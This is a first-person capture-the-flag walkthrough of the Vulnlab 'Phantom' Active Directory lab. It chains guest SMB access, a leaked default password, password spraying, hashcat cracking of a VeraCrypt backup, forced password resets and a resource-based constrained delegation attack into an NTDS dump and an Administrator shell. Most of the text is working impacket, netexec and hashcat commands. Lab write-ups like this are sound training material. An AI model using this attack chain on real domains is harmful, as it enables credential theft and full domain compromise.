VL-Phantom

Vulnlab Phantom: Advanced Resource-Based Constrained Delegation Attack Walkthrough

This detailed Vulnlab penetration testing walkthrough documents my systematic approach to compromising the Phantom Active Directory environment. Beginning with thorough reconnaissance and open-source intelligence gathering from an exposed email attachment, I discovered a default onboarding password being used across the domain. Through methodical password spraying, encrypted backup cracking, and privilege escalation via service account compromise, I ultimately executed an advanced Resource-Based Constrained Delegation (RBCD) attack to achieve domain administrator access. This step-by-step technical guide demonstrates sophisticated Active Directory exploitation techniques including password manipulation, Kerberos ticket manipulation, and delegation abuse - essential knowledge for security professionals conducting thorough penetration tests against enterprise environments. The walkthrough illustrates how seemingly minor security oversights, like unchanged default passwords and excessive user permissions, can be chained together to completely compromise an Active Directory domain.

Initial Reconnaissance

First, I performed a port scan to identify available services:

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory 
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory 
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: PHANTOM
|   NetBIOS_Domain_Name: PHANTOM
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: phantom.vl
|   DNS_Computer_Name: DC.phantom.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-04-05T12:12:58+00:00
5357/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49681/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49714/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49839/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

The open ports reveal this is a Windows domain controller (phantom.vl) with typical Active Directory services running, including SMB, Kerberos, LDAP, and WinRM.

Initial Access

I started by exploring SMB shares accessible with the guest account:

netexec smb phantom.vl -u 'guest' -p '' --shares

I discovered a publicly accessible share that I could connect to:

smbclient //10.10.122.37/Public -U guest

get tech_support_email.eml

Extracting User Information

I examined the email file for potential user accounts:

strings tech_support_email.eml

Two possible users were identified:

alucas@phantom.vl
techsupport@phantom.vl

The email also contained an embedded PDF with onboarding instructions. I extracted it using:

munpack tech_support_email.eml

The PDF revealed a potential default password used during employee onboarding: Ph4nt0m@5t4rt!

User Enumeration

Using the null session access, I was able to enumerate all domain users:

impacket-lookupsid phantom.vl/guest@10.10.122.37 -target-ip 10.10.122.37 -no-pass

User list obtained:

Administrator
Guest
krbtgt
DC$
svc_sspr
rnichols
pharrison
wsilva
elynch
nhamilton
lstanley
bbarnes
cjones
agarcia
ppayne
ibryant
ssteward
wstewart
vhoward
crose
twright
fhanson
cferguson
alucas
ebryant
vlynch
ghall
ssimpson
ccooper
vcunningham

Password Spraying

I performed a password spray using the default onboarding password:

netexec smb phantom.vl -u usernames.txt -p 'Ph4nt0m@5t4rt!' --continue-on-success

I found one user who hadn’t changed their default password:

ibryant:Ph4nt0m@5t4rt!

Privilege Escalation Path

Using the compromised account, I checked for additional share access:

netexec smb phantom.vl -u ibryant -p 'Ph4nt0m@5t4rt!' --shares

I now had access to the “Departments Share” as well as NETLOGON and SYSVOL. I explored the new share:

smbclient //10.10.122.37/'Departments Share' -U ibryant

I attempted to download all files recursively:

recurse ON
prompt OFF
mget *

This failed due to large files in the IT share, so I specifically targeted the backup file:

smbclient //10.10.122.37/'Departments Share' -U ibryant -c 'timeout 120; iosize 16384; get \IT\Backup\IT_BACKUP_201123.hc'

Cracking the Encrypted Backup

The backup file was encrypted with VeraCrypt. To crack it, I first extracted the hash:

dd if=./it.hc of=./hash bs=512 count=1

I attempted to crack it with standard wordlists:

hashcat -m 13722 -a 0 hash /usr/share/wordlists/rockyou.txt

When that failed, I created a custom wordlist and rule file:

cat phantom.txt
phantom
Phantom
PHANTOM
PHANT0M
phant0m
phantom.vl
PHANTOM.VL
phant0m.vl
PHANT0M.vl
Ph4nt0m
PH4NT0M

cat phantom.rule 
$2 $0 $2 $3 $$
$2 $0 $2 $3 $&
$2 $0 $2 $3 $@
$2 $0 $2 $3 $!
$2 $0 $2 $3 $#
$2 $0 $2 $3 $%
$2 $0 $2 $3 $^
$2 $0 $2 $3 $*
$2 $0 $2 $3 $(
$2 $0 $2 $3 $)
$2 $0 $2 $3 $-
$2 $0 $2 $3 $_
$2 $0 $2 $3 $=
$2 $0 $2 $3 $+

I ran hashcat with the custom wordlist and rules:

hashcat -a 0 -m 13721 it.hc phantom.txt -r phantom.rule

The password was cracked:

it.hc:<NOPE>

Analyzing Encrypted Contents

I mounted the encrypted volume:

veracrypt it.hc

After searching through the files, I found credentials for user lstanley in /config/config.boot:

vpn {
    sstp {
        authentication {
            local-users {
                username lstanley {
                    password "PASS"
                }
            }
            mode "local"
        }

Further Account Compromise

I checked if any service accounts used the same password:

netexec smb phantom.vl -u usernames.txt -p '' --shares --continue-on-success

I confirmed we had WinRM access with these credentials:

netexec winrm phantom.vl -u svc_sspr -p ''

BloodHound Analysis

I used BloodHound to map potential attack paths:

netexec ldap 10.10.108.178 -u svc_sspr -p '' --bloodhound --dns-server 10.10.108.178 -c All --dns-tcp

I discovered that users in the ICT Security group had AddAllowedToAct permissions:

I checked if we could add new computers to the domain:

netexec ldap 10.10.108.178 -u svc_sspr -p 'PASS' -M maq

The result showed MachineAccountQuota: 0, meaning we couldn’t add new computer accounts.

Compromising Additional Users

Using the ForceChangePassword privilege, I reset passwords for several users:

net rpc password "crose" "newP@ssword2022" -U "phantom.vl"/"svc_sspr"%'PASS' -S DC.phantom.vl

net rpc password "wsilva" "newP@ssword2022" -U "phantom.vl"/"svc_sspr"%'PASS' -S DC.phantom.vl

net rpc password "rnichols" "newP@ssword2022" -U "phantom.vl"/"svc_sspr"%'PASS' -S DC.phantom.vl

I checked if any of these users could add machines to the domain:

netexec ldap 10.10.108.178 -u usernames-p 'newP@ssword2022' -M maq

None of them had this privilege.

Resource-Based Constrained Delegation (RBCD) Attack

Since we couldn’t add computer accounts, I had to leverage RBCD on SPN-less users. The process involves:

1. Obtaining a TGT for the SPN-less user allowed to delegate to a target and retrieving the TGT session key
2. Changing the user’s password hash to match the TGT session key
3. Combining S4U2self and U2U to obtain a service ticket to the target on behalf of a more privileged user
4. Using the ticket to access the target as the delegated user

I chose to use the wsilva account for this attack:

impacket-rbcd -delegate-from 'wsilva' -delegate-to 'DC$' -dc-ip '10.10.108.178' -action 'write' 'phantom.vl'/'wsilva':'newP@ssword2022'

Next, I obtained a TGT through overpass-the-hash to use RC4:

impacket-getTGT -hashes :$(pypykatz crypto nt 'newP@ssword2022') 'phantom.vl'/'wsilva'

export KRB5CCNAME=wsilva.ccache

I extracted the TGT session key:

impacket-describeTicket wsilva.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key            : 08d09e30adcdade32338f3241b5b183d

Then I changed the user’s NT hash to match the TGT session key:

impacket-changepasswd -newhashes :08d09e30adcdade32338f3241b5b183d 'phantom.vl'/'wsilva':'newP@ssword2022'@'DC.phantom.vl'

With this setup complete, I obtained a delegated service ticket through S4U2self+U2U, followed by S4U2proxy:

impacket-getST -k -no-pass -u2u -impersonate "Administrator" -spn "cifs/DC.phantom.vl" 'phantom.vl'/'wsilva'

I set the Kerberos ticket for use:

export KRB5CCNAME=Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache

Finally, I was able to access domain controller resources as Administrator:

nxc smb DC.phantom.vl --use-kcache --ntds

And establish a shell with the compromised Administrator hash:

evil-winrm -i phantom.vl -u Administrator -H <HASH>

https://api.vulnlab.com/api/v1/share?id=3c11f61d-bbef-4060-a25c-218e7e931b55